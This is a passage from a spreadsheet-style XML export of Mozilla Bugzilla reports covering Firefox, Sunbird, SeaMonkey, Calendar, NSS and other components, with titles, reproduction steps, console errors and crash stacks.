0. rename or delete sunbird profile 
1. start sunbird
2. tools -&gt; javascript console
Actual Results:  
Error: this.CalendarPreferences.calendarWindow.currentView has no properties
Source File: chrome://calendar/content/pref/rootCalendarPref.js
Line: 85
Error: this.CalendarPreferences.calendarWindow.currentView has no properties
Source File: chrome://calendar/content/pref/rootCalendarPref.js
Line: 80
Error: this.CalendarPreferences.calendarWindow.multiweekView has no properties
Source File: chrome://calendar/content/pref/rootCalendarPref.js
Line: 76</t>
  </si>
  <si>
    <t>FIREFOX-398563</t>
  </si>
  <si>
    <t>[App prefpane] always ask has a generic icon until selected then no icon</t>
  </si>
  <si>
    <t>Created attachment 283555
Screenshot
In the application preference pane when the content has the application set to always ask...has a generic icon. Selecting this always ask and no icon appears inside the selection.  See screenshot</t>
  </si>
  <si>
    <t>FIREFOX-299449</t>
  </si>
  <si>
    <t>File res/hiddenWindow.html missing in installer build</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.1 de-DE rv:1.7.9) Gecko/20050702 Firefox/1.0.5
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.1 de-DE rv:1.7.9) Gecko/20050702 Firefox/1.0.5
When using the installer build (exe-file) of the nightly
2005-07-02-04-aviary1.0.1  Firefox doesn't start up. There is an error message
that the file res/hiddenWindow.html is missing.
After creating an empty file with this name Firefox starts.
The missing file is included in the zip build.
Reproducible: Always
Steps to Reproduce:
1. Install Firefox 2005-07-02 using the installer build
2. Try to start Firefox
3.
Actual Results:  
Firefox doesn't start. Error message about missing file res/hiddenWindow.html
shows up.
Expected Results:  
Firefox should start :-)</t>
  </si>
  <si>
    <t>mtaeuber</t>
  </si>
  <si>
    <t>CORE-473078</t>
  </si>
  <si>
    <t>modernize xpcom i/o launch and reveal methods on Mac OS X</t>
  </si>
  <si>
    <t>Created attachment 356430
fix v1.0
We should modernize our xpcom i/o launch and reveal methods on Mac OS X. This is part of bug 456662.</t>
  </si>
  <si>
    <t>CALENDAR-327971</t>
  </si>
  <si>
    <t>schema version checker failure blows away existing db tables</t>
  </si>
  <si>
    <t>If the schema version checker for calStorageProvider fails for some unknown reason the provider will attempt to drop all the tables and start over.  It should really just use the error-announcer to notify the user.</t>
  </si>
  <si>
    <t>CORE-458356</t>
  </si>
  <si>
    <t>js1_8_1/genexps/regress-380237-0[34].js fail</t>
  </si>
  <si>
    <t>js1_8/genexps/regress-380237-03.js
Decompilation of generator expressions reason: 
Expected value ' function ( ) { with ( x for ( x in [ ] ) ) { } } ' 
Actual value   ' function ( ) { with ( ( x for ( x in [ ] ) ) ) { } } '
regressed by bug 457789 http://hg.mozilla.org/mozilla-central/rev/3c899d350d7f</t>
  </si>
  <si>
    <t>CORE-460349</t>
  </si>
  <si>
    <t>Crash [@ nsNativeThemeCocoa::DrawPushButton] with MathML</t>
  </si>
  <si>
    <t>Created attachment 343463
testcase (crashes Firefox when loaded)
Loading the testcase in a debug Firefox build triggers:
firefox-bin[2945] : Unable to create bitmap delegate device
firefox-bin[2945] : createBitmapContext: failed to create delegate.
firefox-bin[2945] : CGContextTranslateCTM: invalid context
objc[2945]: FREED(id): message autorelease sent to freed object=0x1ca26120
Crash [@ _freedHandler]
If MallocScribble is enabled the freed object warning doesn't appear and the crash occurs [@ objc_msgSend] instead dereferencing 0x55555575.  Either way nsNativeThemeCocoa::DrawPushButton is on the stack.
I guess the fix for bug 444864 didn't take care of this :(</t>
  </si>
  <si>
    <t>SEAMONKEY-233863</t>
  </si>
  <si>
    <t>Recommended patches for Mozilla on Solaris need updating</t>
  </si>
  <si>
    <t>User-Agent:       
Build Identifier: Mozilla/5.0 (X11 U SunOS sun4u en-US rv:1.6) Gecko/20040209 Firefox/0.8
I've noticed a problem when a compiled Mozilla 1.6 on Solaris can crash on
Solaris machines even if they have the recommended Solaris patches in
'Installation Instructions for Mozilla Ports' page at
http://www.mozilla.org/releases/mozilla1.6/installation-ports.html
I am compiling Mozilla on Solaris 8 with the latest recommended patch cluster
and the following addtional patches...
108434-14  108435-14  108773-18  109147-27  111697-04  111721-04
The machines the build crashes have at least the minimum patch revisions on the
Mozilla web page but they don't seem to be enough. I have a suspicion that patch
111721-04 (Solaris 8) and 111722-04 (Solaris 9) for Math Library could be the
culprit as they include support for new data types for which Solaris machines
without that patch would'nt be able to support.
I can't exactly say which patch is definitly causing the problem as when Mozilla
started to crash for me i had it fully deployed in my department and i updated
the patch revisions for Solaris 8 and 9 to their latest versions and sent them
out to all machines to stop people screaming at me
I think the web page detailing the Solaris recommended patches will have to be
updated and possibly the list of patches in the patch checker in Bug ID: 230598
which has just been checked into the 1.7 branch.
This problem came up in the discussion for Bug ID: 230598 and Roland Mainz
(roland.mainz@nrubsig.org) asked if he could be assigned this bug as he is the
person who did the list of recommended patches for Solaris and will look into
this patch problem.
Reproducible: Always
Steps to Reproduce:
1. Compile Mozilla on Solaris machine with latest C++ linker and math libraries.
2. Try running Mozilla on a Solaris machine without those patches.
3.
Actual Results:  
Mozilla began to crash frequently
Expected Results:  
Mozilla should'nt crash</t>
  </si>
  <si>
    <t>michael.kelleher</t>
  </si>
  <si>
    <t>FIREFOX-272166</t>
  </si>
  <si>
    <t>nsIWindowsShellService::getRegistryEntry does not support non-latin1 keys/values</t>
  </si>
  <si>
    <t>79     string getRegistryEntry(in long aHKeyConstant in string aSubKeyName in
string aValueName)
This means that only latin1 is supported. Worse on a non-latin1 (guess that's
really a non-windows1252) system the characters will be interpreted as latin1
likely leading to garbage for non-ascii characters.
this should use wstring or AString in the IDL. seamonkey has the same bug which
I will file in a second.</t>
  </si>
  <si>
    <t>CALENDAR-247865</t>
  </si>
  <si>
    <t>eventDialog: reference to undefined property opener.gCalendarWindow.calendarManager.calendars</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.0 en-US rv:1.7) Gecko/20040616
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.0 en-US rv:1.7) Gecko/20040616
Warning: reference to undefined property
opener.gCalendarWindow.calendarManager.calendars
eventDialog.js  Line 274
Appears to be left over code as result is not used.
Reproducible: Always
Steps to Reproduce:
1. turn on strict javascript warnings 
   (about:config  javascript.options.strict true)
2. double click an existing event
3.
Actual Results:  
above warning appears in javascript console 
(tools | web development | javascript console)
Expected Results:  
no warnings</t>
  </si>
  <si>
    <t>CORE-398903</t>
  </si>
  <si>
    <t>Crash [@ nsSVGEnum::SetBaseValue] setting orient attribute on a marker</t>
  </si>
  <si>
    <t>Created attachment 283896
testcase
I can only reproduce this in non-libxul builds. Since the checkin for bug 383685 (2007-09-25) an svg:marker element with an orient attribute (any value) causes an access violation in gklayout.
From what I understand it's because SetAttr calls mOrientType.SetBaseValue which expects all nsSVGEnum to have mappings and orientType doesn't.
&gt;	gklayout.dll!nsSVGEnum::SetBaseValue(unsigned short aValue=1 nsSVGElement * aSVGElement=0x02c8ed78 int aDoSetAttr=0)  Line 105 + 0x9	C++
 	gklayout.dll!nsSVGMarkerElement::SetAttr(int aNameSpaceID=0 nsIAtom * aName=0x014efb58 nsIAtom * aPrefix=0x00000000 const nsAString_internal &amp; aValue={...} int aNotify=0)  Line 306	C++
 	gklayout.dll!nsXMLContentSink::AddAttributes(const unsigned short * * aAtts=0x00000000 nsIContent * aContent=0x014efb58)  Line 1500 + 0x32	C++
 	gklayout.dll!nsXMLContentSink::HandleStartElement(const unsigned short * aName=0x00000000 const unsigned short * * aAtts=0x0207cf90 unsigned int aAttsCount=2 int aIndex=-1 unsigned int aLineNumber=1 int aInterruptable=1)  Line 1058	C++
...</t>
  </si>
  <si>
    <t>BUGZILLA-137183</t>
  </si>
  <si>
    <t>userprefs.cgi: tab names should be in the template not in the .cgi</t>
  </si>
  <si>
    <t>my @tabs = ( { name =&gt; account description =&gt; Account settings 
               saveable =&gt; 1 }
             { name =&gt; email description =&gt; Email settings 
               saveable =&gt; 1 }
             { name =&gt; footer description =&gt; Page footer 
               saveable =&gt; 1 }
             { name =&gt; permissions description =&gt; Permissions 
               saveable =&gt; 0 } )
The description (tab header) should really be in the
template/default/pref/userprefs.tmpl. This blocks the translation of the
templates: bug 126955 and bug 135604 and is highly user visible.
For the longer term also the error messages need to be moved into a translatable
form:
DisplayError(I was unable to retrieve your old password from the database.)
DisplayError(You did not enter your old password correctly.)
DisplayError(The two passwords you entered did not match.)
DisplayError(You must enter a new password.)
DisplayError(You must enter your old password to change email address.)
DisplayError(Email change already in progress please check your email.)
DisplayError(Account $new_login_name already exists)
An email has been sent to both old and new email addresses to confirm the
change of email address.
DisplayError(Hmm the $name query seems to have gone away.)</t>
  </si>
  <si>
    <t>SEAMONKEY-158820</t>
  </si>
  <si>
    <t>[patch] Changing a list's bullet does not apply to items having a specific bullet</t>
  </si>
  <si>
    <t>1. launch Composer
3. make an ordered list with 3 items
4. double-click on second item's marker and change the numbering *for this item
   only* from automatic to a b c
5. select all list and change its numbering system from automatic to i ii iii
Expected result : 3 list items numbered i ii and iii
Result          : 3 list items numbered i b and iii
Diagnosis : the dialog updates the TYPE attribute on the list but it does not
            remove the attribute on the list items... It should.</t>
  </si>
  <si>
    <t>CORE-261073</t>
  </si>
  <si>
    <t>[FIXr]Error: Function token for non-function pseudo-class or pseudo-element or the other way around when reading 'nth-child'.  Selector expected.  Ruleset ignored due to bad selector.</t>
  </si>
  <si>
    <t>Error: Function token for non-function pseudo-class or pseudo-element or the
other way around when reading 'nth-child'.  Selector expected.  Ruleset ignored
due to bad selector.
Source File: http://devedge.netscape.com/lib/css/nde-sidebar-style.css
Line: 14
li:nth-child(2n) {background: white}
http://www.w3.org/TR/2001/CR-css3-selectors-20011113/#nth-child-pseudo
 we report that error (and bail) before we get to the place where we find
out it's unknown
 It's not on our list of function pseudos
 in fact it's not on our list of anything since we don't implement it.</t>
  </si>
  <si>
    <t>CORE-220611</t>
  </si>
  <si>
    <t>[FIX]binhex regression (endianness issue)</t>
  </si>
  <si>
    <t>cvs diff -u0 -r 1.11 -r 1.12 netwerk/streamconv/converters/nsBinHexDecoder.cpp 
-#ifndef XP_MAC
+#if defined(XP_MAC) || defined(XP_MACOSX)
                mOctetBuf.val = PR_ntohl(mOctetBuf.val)
Oops.  Now the endianness of the data is wrong on non-Mac systems (since this
code never runs now).  Not cool at all.
Patch coming up that makes binhex sorta limp again on Linux though still with
issues.</t>
  </si>
  <si>
    <t>SEAMONKEY-212605</t>
  </si>
  <si>
    <t>Location Bar</t>
  </si>
  <si>
    <t>Include Bookmark Keywords in autocomplete and give them priority over history</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Win98 en-US rv:1.4) Gecko/20030706
Build Identifier: Mozilla/5.0 (Windows U Win98 en-US rv:1.4) Gecko/20030706
Bookmark keywords are not included in autocomplete results unless they have been
typed in previously. When they are included they are surrounded by http:// and
/ as if they were host names. (At least this happens with keywords with no
arguments. Keywords with arguments don't show up at all.)
Reproducible: Always
Steps to Reproduce:
1. Create a new simple bookmark keyword with no arguments.
1. Enter it in the location bar noting the autocomplete entries.
2. Type it in again and look at the autocomplete entries again.
Actual Results:  
The first time the keyword is entered it doesn't show up in the autocomplete at
all (unless you gave it a name that too closely matches a place you visited before.)
The second time among the autocomplete results you will see the keyword
surrounded by http:// and / like it was a host name.
Expected Results:  
Even on first typing in the keyword in the location bar it should show up in the
autocomplete results not made up like an URL.  Idealy I think bookmark keyword
matches should rank higher than URLs in typeahead but at this point I'd be
happy to just have them show up properly.
Using 1.4 with no-GDI caching patch from bug 204374.</t>
  </si>
  <si>
    <t>jlayoj3121968</t>
  </si>
  <si>
    <t>CALENDAR-430280</t>
  </si>
  <si>
    <t>bad aOperationType on addItem</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (X11 U Linux i686 fr-FR rv:1.9b5) Gecko/2008032619 Firefox/3.0b5
Build Identifier: 
It seems that when you call an addItem on an CalDav calendar the aListener.onOperationComplete is always called with Components.interfaces.calIOperationListener.MODIFY. 
I thinks it comes from the underlying calMemoryCalendar (cache system) 
in fact an modifyItem is called from this calMemoryCalendar when you do an adoptItem on caldav calendar
Reproducible: Always
Steps to Reproduce:
1.call aTargetCalendar.addItem(aCalItem aListener)
2.test the value of aListener.onOperationComplete(aOperationType
3.
Actual Results:  
aOperationType always = Components.interfaces.calIOperationListener.MODIFY.
Expected Results:  
aOperationType = Components.interfaces.calIOperationListener.ADD
i need this because i want that the ITIP bar display a message like :
- The event has been updated 
- The event has been added (which is now always that)</t>
  </si>
  <si>
    <t>informatique.internet</t>
  </si>
  <si>
    <t>WEBSITES-873114</t>
  </si>
  <si>
    <t>Please add http://sporadicdispatches.blogspot.com/ to planet</t>
  </si>
  <si>
    <t>Hi. I started working with Mozilla back in November on our WebRTC implementation. I've set up a blog to share various observations -- currently with a back-log of half-finished posts on topics pertaining mostly to WebRTC (it's a bit sparse at the moment but that's because I haven't had time to set aside for polishing my posts into something that's worth publishing).
In any case when I do make the time to publish these things I think most of what I have to say will be of interest to the p.m.o readership. If you could add my feed into p.m.o I would be quite appreciative:
http://sporadicdispatches.blogspot.com/ 
If you need a bio to go with the blog you can use the one I have up on hacks.m.o: Adam Roach works with Mozilla's WebRTC implementation team putting real-time technologies into the core library shared by Firefox and FirefoxOS. He has been crafting the world of Real Time Communications over IP since 1997 by doing protocol standardization architecture design and implementation.
Thanks!</t>
  </si>
  <si>
    <t>SEAMONKEY-501772</t>
  </si>
  <si>
    <t>Port Bug 500978 |Download Manager treats search terms as regular expressions| to SeaMonkey</t>
  </si>
  <si>
    <t>We're using the same .search(term)==-1 approach in treeView.js's initTree() so the fix should be pretty straight-forward.
The patch attached to bug 500978 doesn't contain the test see bug 500978 comment 3 for the link to the checkin which contains it (a modification of test_multiword_search.xul which we also have).
Maybe a good first bug? Otherwise I can do this after the DM keys bug 474622.</t>
  </si>
  <si>
    <t>FIREFOX-395004</t>
  </si>
  <si>
    <t>FUEL: add enabled flag to fuelIExtension object</t>
  </si>
  <si>
    <t>It would be great if in addition to seeing whether an extension exists you could easily see whether or not it is enabled.  There doesn't seem to be a nice clean way to do this via nsIExtensionManager.</t>
  </si>
  <si>
    <t>CORE-346458</t>
  </si>
  <si>
    <t>Page input field receives no focus after standby and new instance</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.1 nl rv:1.8.0.5) Gecko/20060719 Firefox/1.5.0.5
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.1 nl rv:1.8.0.5) Gecko/20060719 Firefox/1.5.0.5
I have multiple instances of Firefox running on my machine and I put my machine to standby (Start -&gt; Shut Down -&gt; Stand By). I pull my machine out of standby and I open a n* instance of Firefox (so if I have 2 instances I open a third one for the non whizkids :) ). The startpage appears (in my case Google). But the textfield does not get a focus not by clicking on it not by tab nor by default (Google has an auto focus). This is extremely annoying. You can get the focus back by minimizing this n* instance of Firefox and then maximize it again.
Reproducible: Sometimes
Steps to Reproduce:
1. Open multiple Firefox instances
2. Put Windows to standby
3. Open another instance of Firefox
Actual Results:  
The page that appeared as startpage does not receive a focus in any way. When I start typing text (expecting that it will appear in the Google textfield) this text appears in the 'Find' bar at the bottom of the browser.
Expected Results:  
Set the (auto) focus to the textfield.</t>
  </si>
  <si>
    <t>box</t>
  </si>
  <si>
    <t>BUGZILLA-371016</t>
  </si>
  <si>
    <t>Versions are no longer sorted by version-sort</t>
  </si>
  <si>
    <t>Versions used to be sorted by vers_cmp in the UI during the 2.23 development cycle but we apparently broke that when we started using Bugzilla::Object for Bugzilla::Version. The fix is simple though--we just have to override new_from_list and have it return its array sorted with vers_cmp.</t>
  </si>
  <si>
    <t>CORE-83708</t>
  </si>
  <si>
    <t>frameset + table + sizes = boom!</t>
  </si>
  <si>
    <t xml:space="preserve">This is the page:
And this is foo.html:
&lt;img src=http://www.google.com/images/title_homepage4.gif WIDTH=8
HEIGHT=40000&gt;
</t>
  </si>
  <si>
    <t>TOOLKIT-245043</t>
  </si>
  <si>
    <t>Installing multiple extensions via InstallTrigger.install() fails</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.7) Gecko/20040529 Firefox/0.8.0+
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.7) Gecko/20040529 Firefox/0.8.0+
When more than one extension is installed via an InstallTrigger only some of
them install. Initially they all display in the Extension Manager but one by one
they disappear until only a few are left.
Reproducible: Sometimes
Steps to Reproduce:
1. Visit the URL (or see the attachment in the next comment for a testcase)
2. Click All then Install Extensions
3. When the Software Install box appears click Install
Actual Results:  
Only some of the extensions were installed
Expected Results:  
All of the extensions should have been installed
Sorry if this is not a front end bug.</t>
  </si>
  <si>
    <t>MOZILLA_LABS-441202</t>
  </si>
  <si>
    <t>Operator</t>
  </si>
  <si>
    <t>Add to Google Calendar fails with location property of hCalendar</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.9) Gecko/2008052906 Firefox/3.0
Build Identifier: 0.9.3
Any hCalendar microformat with the location element causes the Add to Google Calendar action to be non-functional (i.e. nothing happens when clicking). Additional details and examples can be found at the URL I submitted with this report.
Reproducible: Always
Steps to Reproduce:
1. Create a valid hCalendar microformat minus the location element
2. Test with Events &gt; Add to Google Calendar (will work)
3. Add a simple location e.g. Conference Room to the same sample hCalendar microformat
3. Test again with Events &gt; Add to Google Calendar (will not work)
Actual Results:  
As indicated the hCalendar without the location element will be populated nicely into Google Calendar's Add Event form once a location element is added Events &gt; Add to Google Calendar does not respond for that event.
Expected Results:  
The value of the location element should be added to the Google Calendar query string and populated into the Add Event form accordingly. Again on the URL submitted with this bug I have a sample Google Calendar event URL that has a simple location added in the Query string.
I have also replicated this on Mac OS X Tiger on both Windows XP and Mac I was using Firefox 3.0
Thank you so much for your time and effort on this project.</t>
  </si>
  <si>
    <t>karl.stolley</t>
  </si>
  <si>
    <t>NSS-422859</t>
  </si>
  <si>
    <t>libPKIX builds &amp; validates chain to root not in the caller-provided anchor list</t>
  </si>
  <si>
    <t>This bug was originally reported by Kai Engert in bug 406755 comment 37.
He reports that he called CERT_PKIXVerifyCert passing it a set of one or
more certificates to be used as explicit trust anchors and a policy OID
and a cert from a particular server.
He expected the function call to either 
a) succeed and return a chain that was anchored by one of the roots he 
supplied or 
b) fail
Instead he reports that it succeeded but the root CA cert that it returned
as being the matching trust anchor was NOT one of the certs he had passed 
in to the call but rather was one of NSS's built-in trusted root certs.
So it appears that NSS did not use the caller-supplied list of anchors 
to the exclusion of all the other usual trust anchors but merely in 
addition to the usual trust anchors.  
This is bad news for EV.  
I think we should try to reproduce this with vfychain or vfyserv.  
I will attempt to attach to this bug a zip file containing the certs 
sent by the server in the TLS handshake.  
I don't know exactly how many root CA certs Kai passed to CERT_PKIXVerifyCert
but I believe that one of them was the cert found at 
http://crt.comodoca.com/COMODOCertificationAuthority.crt
and the EV policy OID used with it was 1.3.6.1.4.1.6449.1.2.1.5.1
Kai can you tell us if there were any other certs passed as trust anchors?</t>
  </si>
  <si>
    <t>FIREFOX-522262</t>
  </si>
  <si>
    <t>Aero Peek shows progress circles instead of thumbnails/previews</t>
  </si>
  <si>
    <t>From bug 474056 comment #54:
&gt; Out of the ten tabs that I have only the
&gt; last one currently has a preview all others just display a progress circle.
&gt; New tabs get a preview though
Need to investigate this and find the cause. It seems as though the DWM isn't getting the thumbnail/preview.</t>
  </si>
  <si>
    <t>CORE-801241</t>
  </si>
  <si>
    <t>location.href = URL fails in Scratchpad</t>
  </si>
  <si>
    <t>On a Mac Nightly I get an error in the Scratchpad trying to execute
location.href = http://www.mozilla.org
and the location does not change.
This worked fine in an Oct 11 Nightly and I get the errors in the Oct 12 nightly.
CC'ing bholley because he has touched the location object (in case that's the problem) and because in that range he checked in http://hg.mozilla.org/mozilla-central/rev/ab15ebccc0c0 which touches evalInSandbox().
STR:
1. Shift-F2 to open the scratchpad
2. type =&gt; 
      location.href = http://www.mozilla.org
3. Cmd/Ctrl-R to execute
Expected: Navigation to www.mozilla.org
Actual: error comment gets pasted into the Scratchpad</t>
  </si>
  <si>
    <t>MAILNEWS_CORE-178680</t>
  </si>
  <si>
    <t>Improve charset check in SetMailCharacterSetToMsgWindow</t>
  </si>
  <si>
    <t>Since there is no menu item for us-ascii we do special case handling to map it
to ISO-8859-1. Currently the callers of SetMailCharacterSetToMsgWindow() do
that but we can do that inside the function instead.</t>
  </si>
  <si>
    <t>CAMINO_GRAVEYARD-327966</t>
  </si>
  <si>
    <t>disable Bigger/Smaller Text in about:bookmarks/about:history</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Macintosh U PPC Mac OS X Mach-O en-US rv:1.8.0.1) Gecko/20060214 Camino/1.0
Build Identifier: Mozilla/5.0 (Macintosh U PPC Mac OS X Mach-O en-US rv:1.8.0.1) Gecko/20060214 Camino/1.0
After invoking Show All Bookmarks the menu items Bigger Text Smaller Text and Text Encoding remain enabled. Invoking them doesn't seem to do anything. That is however until you invoke Hide All Bookmarks. The commands you've invoked turn out to have affected the page you visited just before about:bookmarks.
Reproducible: Always
Steps to Reproduce:
1. Browse to www.caminobrowser.org and note the text size.
2. Bookmarks &gt; Show All Bookmarks
3. View &gt; Bigger Text | Smaller Text (or pick a different text encoding from View &gt; Text Encoding).
4. Bookmarks &gt; Hide All Bookmarks
Actual Results:  
The size of the text in the bookmarks manager did not change but the text on www.caminobrowser.org did.
Expected Results:  
The text size in about:bookmarks should have changed when using Bigger/Smaller Text. View &gt; Text Encoding should probably be disabled altogether in bookmarks view.</t>
  </si>
  <si>
    <t>camino.del.falcon</t>
  </si>
  <si>
    <t>FIREFOX_BUILD_SYSTEM-314018</t>
  </si>
  <si>
    <t>Error in configure(.in): Sun CXX (CC) compiler defiens __SUNPRO_CC and not __SUNPRO_C</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (X11 U SunOS i86pc en-US rv:1.9a1) Gecko/20051026 SeaMonkey/1.1a
Build Identifier: Mozilla/5.0 (X11 U SunOS i86pc en-US rv:1.9a1) Gecko/20051026 SeaMonkey/1.1a
Sun Studio Compiler (CC) version check is wrong (configure.in lines 2025-2031):
        CXX_VERSION=`$CXX -V 2&gt;&amp;1 | grep '^CC:' 2&gt;/dev/null | $AWK -F\: '{ print $2 }'`
       AC_MSG_CHECKING([for Forte compiler version &gt;= WS6U2])
       AC_TRY_COMPILE([]
           [#if (__SUNPRO_C &lt; 0x530)
           #error Denied
           #endif]
           _BAD_COMPILER=_BAD_COMPILER=1)
cc(aka CC) defines __SUNPRO_C and CC(aka CXX) defines __SUNPRO_CC
Reproducible: Always</t>
  </si>
  <si>
    <t>foundit</t>
  </si>
  <si>
    <t>CORE-139843</t>
  </si>
  <si>
    <t>overflow:auto DIV with table inside shows horizontal scrollbar -  pixel align scrollbox frame</t>
  </si>
  <si>
    <t>A DIV with overflow:auto style containing a table with a width of 100% shows a
horizontal scrollbar.</t>
  </si>
  <si>
    <t>cgatesman</t>
  </si>
  <si>
    <t>MOZILLA_MESSAGING-491252</t>
  </si>
  <si>
    <t>Need libnotify dev headers installed on Linux tinderboxes and build machines</t>
  </si>
  <si>
    <t>See bug 473831/bug 469880 for background - we need to ensure we have the libnotify dev headers installed on the boxes.
Bug 473831 comment 8 has instructions for what Nick did on the MoCo boxes.
momo-vm-12 definitely needs these I expect our other Linux boxes need checking. We should also check the try server.</t>
  </si>
  <si>
    <t>CORE-472383</t>
  </si>
  <si>
    <t>Workers: JS/C++/JS/C++ recursion not properly guarded</t>
  </si>
  <si>
    <t>Created attachment 355661
Patch v1
Workers guard against JS recursion but not when it calls back into C++. Patch attached with testcase.</t>
  </si>
  <si>
    <t>CORE-323628</t>
  </si>
  <si>
    <t>Crash [@ PresShell::HandleDOMEventWithTarget] [@ nsMenuFrame::Execute] when clicking submenu of popup with :after css rule</t>
  </si>
  <si>
    <t>See upcoming testcase follow the directions in the testcase to get the crash.
This testcase was basically derived from bug 265897 but I get a different stack and the way to reproduce is a bit different.
From talkback ID: TB14025503Q
PresShell::HandleDOMEventWithTarget  [c:/builds/tinderbox/Fx-Trunk/WINNT_5.2_Depend/mozilla/layout/base/nsPresShell.cpp line 6099]
nsMenuFrame::Execute  [c:/builds/tinderbox/Fx-Trunk/WINNT_5.2_Depend/mozilla/layout/xul/base/src/nsMenuFrame.cpp line 1659]
nsMenuFrame::HandleEvent  [c:/builds/tinderbox/Fx-Trunk/WINNT_5.2_Depend/mozilla/layout/xul/base/src/nsMenuFrame.cpp line 456]
PresShell::HandleEventInternal  [c:/builds/tinderbox/Fx-Trunk/WINNT_5.2_Depend/mozilla/layout/base/nsPresShell.cpp line 6046]
PresShell::HandleEvent  [c:/builds/tinderbox/Fx-Trunk/WINNT_5.2_Depend/mozilla/layout/base/nsPresShell.cpp line 5857]
nsViewManager::HandleEvent  [c:/builds/tinderbox/Fx-Trunk/WINNT_5.2_Depend/mozilla/view/src/nsViewManager.cpp line 2545]
nsViewManager::DispatchEvent  [c:/builds/tinderbox/Fx-Trunk/WINNT_5.2_Depend/mozilla/view/src/nsViewManager.cpp line 2237]
HandleEvent  [c:/builds/tinderbox/Fx-Trunk/WINNT_5.2_Depend/mozilla/view/src/nsView.cpp line 176]
nsWindow::DispatchEvent  [c:/builds/tinderbox/Fx-Trunk/WINNT_5.2_Depend/mozilla/widget/src/windows/nsWindow.cpp line 1164]
nsWindow::DispatchMouseEvent  [c:/builds/tinderbox/Fx-Trunk/WINNT_5.2_Depend/mozilla/widget/src/windows/nsWindow.cpp line 6071]
ChildWindow::DispatchMouseEvent  [c:/builds/tinderbox/Fx-Trunk/WINNT_5.2_Depend/mozilla/widget/src/windows/nsWindow.cpp line 6250]
nsWindow::WindowProc  [c:/builds/tinderbox/Fx-Trunk/WINNT_5.2_Depend/mozilla/widget/src/windows/nsWindow.cpp line 1353]
USER32.dll + 0x27b17 (0x77d37b17)
USER32.dll + 0x2cdce (0x77d3cdce)
USER32.dll + 0x4435 (0x77d14435)
USER32.dll + 0x9611 (0x77d19611)
nsAppStartup::Run  [c:/builds/tinderbox/Fx-Trunk/WINNT_5.2_Depend/mozilla/toolkit/components/startup/src/nsAppStartup.cpp line 162]
main  [c:/builds/tinderbox/Fx-Trunk/WINNT_5.2_Depend/mozilla/browser/app/nsBrowserApp.cpp line 61]
kernel32.dll + 0x1eb69 (0x77e5eb69)</t>
  </si>
  <si>
    <t>SEAMONKEY-60581</t>
  </si>
  <si>
    <t>Bookmark context menu should offer Open in New Window</t>
  </si>
  <si>
    <t>When right-clicking on a bookmark in My sidebar (thus invoking a contextual
menu) it would be nice to have the option Open in new window listed there.</t>
  </si>
  <si>
    <t>a.haakmat</t>
  </si>
  <si>
    <t>FIREFOX-511756</t>
  </si>
  <si>
    <t>Trend Micro toolbar related Crash at [@ _woutput_l]</t>
  </si>
  <si>
    <t>Number 10 Firefox topcrash.
http://crash-stats.mozilla.com/report/list?product=Firefox&amp;query_search=signature&amp;query_type=exact&amp;query=&amp;date=&amp;range_value=1&amp;range_unit=weeks&amp;do_query=1&amp;signature=_woutput_l
(filing because no bugs were linked from crash-stats and I couldn't find any in a quick search)</t>
  </si>
  <si>
    <t>CORE-517772</t>
  </si>
  <si>
    <t>In Gmail More Actions Drop Down Menu Appears Momentarily Under Left-Most Button</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.9.2a2pre) Gecko/20090920 Namoroka/3.6a2pre Firefox/3.5.3
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.9.2a2pre) Gecko/20090920 Namoroka/3.6a2pre Firefox/3.5.3
Gmail More Actions drop down menu appears momentarily under left-most button when first viewing message listings. It appears this happens when first clicking on More Actions button for any item on left-hand side (Inbox Starred Sent Mail etc.).
Subsequent tries do not yield this bug. You must go to another item on the left hand side like Starred Sent Mail etc. including any user-defined labels. Each time you go to one of these and then click on the â€œMore Actionsâ€ button the drop down will first appear under the left-most button before shifting to where it should be.
I am seeing this in Minefield (with only the Java Quick Starter add-on) and Namoroka Branch but not Fx 3.5.3.
Reproducible: Always
Steps to Reproduce:
1. Log in to Gmail. Should be in Inbox.
2. Click on the More Actions button.
Subsequent tries without going to another of the left side items first will result in the drop down menu appearing where it should.
Actual Results:  
The More Actions drop down menu appears momentarily under the left-most button (Archive in Inbox Remove Label Name in a labeled message listing) before it shifts over to under the More Actions button.
Expected Results:  
The drop down menu should always appear underneath when clicking the More Actions button.</t>
  </si>
  <si>
    <t>olrrm2020</t>
  </si>
  <si>
    <t>WWW.MOZILLA.ORG_GRAVEYARD-523599</t>
  </si>
  <si>
    <t>[et] Thunderbird 3 in-product pages localization</t>
  </si>
  <si>
    <t>CORE-96414</t>
  </si>
  <si>
    <t>[LNX]Form controls should not use sans-serif fonts</t>
  </si>
  <si>
    <t>Form textfields are now using sans-serif fonts by default in a new profile on
Linux. They should be fixed width only.
Screenshot coming up. I don't think this bug was present before today's builds.</t>
  </si>
  <si>
    <t>CORE-400208</t>
  </si>
  <si>
    <t>nsViewManager mScrollCnt leaks causing flicker</t>
  </si>
  <si>
    <t>Created attachment 285277
obvious patch
nsViewManager::UpdateViewAfterScroll takes a couple of early-exit paths that don't decrement mScrollCnt. This is really bad because it means mScrollCnt will be permanently &gt; 0. And that means we will never flush reflows/restyles when painting which can lead to flicker.
Requesting blocking because this is hurting a new version of a major app by a certain Large Internet Company. The bug is very hard to diagnose or work around and the patch I will attach is very safe.</t>
  </si>
  <si>
    <t>DEVELOPER_DOCUMENTATION-401754</t>
  </si>
  <si>
    <t>Brackets don't match</t>
  </si>
  <si>
    <t>Created attachment 286712
removed one indentation level and a braket.
